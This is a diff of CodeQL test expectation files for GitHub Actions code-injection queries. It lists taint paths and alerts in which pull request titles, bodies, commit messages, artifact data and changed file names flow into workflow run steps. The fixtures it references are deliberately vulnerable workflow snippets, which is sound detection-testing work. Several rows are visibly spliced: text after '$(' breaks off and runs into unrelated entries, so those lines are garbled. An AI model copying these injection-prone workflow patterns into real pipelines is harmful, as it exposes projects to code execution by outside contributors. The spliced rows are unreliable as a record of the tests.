.github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index db8e7b485d7..262912c58a5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> 